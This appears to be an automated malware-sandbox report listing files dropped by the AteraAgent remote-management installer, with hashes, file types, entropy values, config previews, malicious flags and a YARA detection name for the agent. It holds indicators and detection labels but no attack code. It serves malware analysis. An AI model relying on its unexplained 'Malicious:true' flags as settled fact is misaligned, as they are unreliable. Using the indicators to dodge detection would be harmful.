                                                                                                                                                                                                                                                                                                                                  SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2010
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                                                                                                                  MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                                                                                                                  SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                                                                                                                  SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                                                                  MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                                                                  SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=1.6
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                                                                                                                  MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                                                                                                                  SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                                                                                                                  SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                                                                                                                  SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                                                                                                                  MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                                                                                                                  SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                                                                                                                  SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                                                                                                                  MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                                                                                                                  SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                                                                                                                  SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.23943595769723
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Tu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYH:KF+qo7mDEwj4NXLGcfgruFcg7HxRt
                                                                                                                                                                                                                                                                                                                                  MD5:D5B69F2C4F5CB0E7D43D7F6C1C87DC7E
                                                                                                                                                                                                                                                                                                                                  SHA1:98FDA78C049D650E47C17D9072E82D87C1B59E9F
                                                                                                                                                                                                                                                                                                                                  SHA-256:6C1325D183C7CC3E516628921005F18BB5A191B0029AF93DFB022CA4C2ABBAE9
                                                                                                                                                                                                                                                                                                                                  SHA-512:D95C5CD5E9DAC57FA9C5DE8645F637363A5E787A8C521B09BFBEA56D01765F4FC31E4080BDCAD28BBD90FDB9BEE1CAB50E95FF13CFAC728405D87C3EFE3A387B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4113040933608225
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:TQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAMU:T9ML8LW/usybGYVE8mZw+89Wu1e7Hxav
                                                                                                                                                                                                                                                                                                                                  MD5:94B12931B9032E80157DC27422393FEC
                                                                                                                                                                                                                                                                                                                                  SHA1:2B762FCA27538B55ACF736F7D65E293E5F15EAEA
                                                                                                                                                                                                                                                                                                                                  SHA-256:746AD9902D9310CC2F172736AC156018ECD3843BA58C8337DE017074B06CD645
                                                                                                                                                                                                                                                                                                                                  SHA-512:D943A39FDD74627514818DAF3434BD1ABEB4EE10077E8B10414098DDA2972851795A15CBD4CAD73A67D5171446E4A6D844CDF8BD705E72F34B7DA16678097BE9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1343664856235245
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:5jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvM:5+e55LgIkTmyAAfTnMLvM
                                                                                                                                                                                                                                                                                                                                  MD5:FACA1B5218F8EB76963366A6842E122D
                                                                                                                                                                                                                                                                                                                                  SHA1:41B281ABA7D7FE994EE6C77F7F71042885919EC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:D779F3514666734455B5B2B7AEB035F7E1D7394CD445E332DD4D236E24D5C94E
                                                                                                                                                                                                                                                                                                                                  SHA-512:8F350CB3D0C13A701C67749E103B1E07EE1E2EF8EFE71B70CC728F8E21DC02922BAB241CA256695DAC9B225D450623E9F8DA055EA062E336D7F1CD9D2A3FB6D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1409
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.992215339808616
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dNQjY8L2PRRkMYaWcvJ9AwcPGnJg8vQpyriEWZoEs4h:cb8MRRkMVB9AwVbIQdsoEf
                                                                                                                                                                                                                                                                                                                                  MD5:766E089F9AF0DAD5BFD8B77167D1E0FD
                                                                                                                                                                                                                                                                                                                                  SHA1:0AD55E6BA596EFEB24867DC9FDCE4B3D2F2D904F
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D95ED644BB7D706E5B8EBDCB875B23F8B21C62C53C701EB8B3385F770808D7E
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD8ECF32094577A51579911AC3722D839A7B0874146B909EB8DC944CDB5DA459BFCF7EB64B47EC08F40515E6C38B4C4CBA1F4D9F9EB403E891A8710310DBAECA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xsi:schemaLocation="http://www.nlog-project.org/schemas/NLog.xsd NLog.xsd".. autoReload="true".. throwExceptions="false".. internalLogLevel="Off" internalLogFile="c:\temp\nlog-internal.log">.... optional, add some variables.. https://github.com/nlog/NLog/wiki/Configuration-file#variables.. -->.. <variable name="myvar" value="myvalue"/>.... .. See https://github.com/nlog/nlog/wiki/Configuration-file.. for information on customizing logging rules and outputs... -->.. <targets>.... .. add your targets here.. See https://github.com/nlog/NLog/wiki/Targets for possible targets... See https://github.com/nlog/NLog/wiki/Layout-Renderers for the possible layout renderers... -->.... .. Write events to a file with the date in the filename... <target xsi:type="File" na
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071504659955744
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQJ:V1n1p9LdRN39aQZUqM
                                                                                                                                                                                                                                                                                                                                  MD5:17A183A03C34B8EC1C91B3DD0B50E022
                                                                                                                                                                                                                                                                                                                                  SHA1:7D226520BE51BD71D05D7EB56793233794F87DA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:381278035C5A8A4668D31B12F0BF3DEC6544E9668FED84DA038A8D21D233D72D
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD5591F6B90A07C00F10EF19231BB3C766E9E27C2205AB3A32C15B7D0DE0F732A5600665E4302290C771F06370B23E4FF0AC63E51C1F36899F98CCB6BD5F8C01
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960370699367048
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):97328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                                                                                                                  MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                                                                                                                  SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                                                                                                                  SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):342865
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9992844075056935
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:9nQP7HqdkykjdqfvImDTIVfygNymRsl8aejvq13W/V191OQB6MBsUUnf7spSg+V1:9nQP7Hqdk/pqo0IVfb5na9Z619MQBxu9
                                                                                                                                                                                                                                                                                                                                  MD5:B3E14504A48BED32C53EC7AAB2CB2C8F
                                                                                                                                                                                                                                                                                                                                  SHA1:0BC0D486A5ED1C4CDF2390229883ED3473926882
                                                                                                                                                                                                                                                                                                                                  SHA-256:ADEA6001759B5604F60BBAEC8CE536A1E189ADEBC7394F9CFF3921CAE40C8C9B
                                                                                                                                                                                                                                                                                                                                  SHA-512:E5A5C09355EB9CB45DC872B59EDBD54F62F15445CA6CAAA3187E31E7928EF4453AE8405D9EEE5D2AEC4FA34965D3006DCF61C060B8691519A2312382612C683F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):74288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.498724993681897
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:y5TTyapvW7AM3ushkm7Xv2piJQ+VASa0oJoU0BaaOP/7HxZoU:yU48q230au/9
                                                                                                                                                                                                                                                                                                                                  MD5:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                                                                                                                  SHA1:BBA9A471E9300BCD4EBE3359D3F73B53067B781D
                                                                                                                                                                                                                                                                                                                                  SHA-256:C176F54367F9DE7272B24FD4173271FD00E26C2DBDBF944B42D7673A295A65E6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F0A5059B326446A7BD8F4C5B1BA5858D1AFFDC48603F6CE36355DAEAAB4ED3D1E853359A2440C69C5DEE3D47E84F7BF38D7ADF8707C277CD056F6EBCA5942CC5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):541
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                                                                  SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                                                                  SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                                                                  SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXWl:WBQ
                                                                                                                                                                                                                                                                                                                                  MD5:3D66AE5ED06891E8CE75A39A24070844
                                                                                                                                                                                                                                                                                                                                  SHA1:368064119835D4376727A14706C41384446183E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:73DBA8242FDB4DE1393B367A239F730ACA6713E6658BE69F1D8992AD26479176
                                                                                                                                                                                                                                                                                                                                  SHA-512:C0B61F92BB61A7BF90225D1BA5A1BEA0FC077C2481A2149663B546296421855AB3147C3A1F5372EBC920731624BC8578595C18CA9D138691C720FDCB86D03F8A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=23.4
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.180256382950937
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwht:gQUm2H5KTfOLgxFJjE50vksVUfPvC6
                                                                                                                                                                                                                                                                                                                                  MD5:EBBE06F612E1C8B87E3D4AACA15A29B5
                                                                                                                                                                                                                                                                                                                                  SHA1:D2B1317ED96EC0C92CCAF7E85F68EE24F289413F
                                                                                                                                                                                                                                                                                                                                  SHA-256:6CD16DCE27E724C2DAA098F131343FFDBBED0DA5B7EF62542B421A0817DE3A3E
                                                                                                                                                                                                                                                                                                                                  SHA-512:EB079EB409925516118DB4980BE734A645B7444BC51862CE7C95D52E0697B7B937BBACAF421FC5AF1A01D3262C1B19A3CF9376ADB0A5537DE0973E0B7DDE63DF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960782910515381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:PBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUJ:PBjk38WuBcAbwoA/BkjSHXP36RMG8
                                                                                                                                                                                                                                                                                                                                  MD5:3B395830460C2F72BC6CD12DD096DB0C
                                                                                                                                                                                                                                                                                                                                  SHA1:73063C63D2B562310AF76ABEF2A8B7E697389C94
                                                                                                                                                                                                                                                                                                                                  SHA-256:F7BB07B7C1718DBBCB692AA4296EBEFD7CCD1E55F27BE00703A3CE623AD38D5B
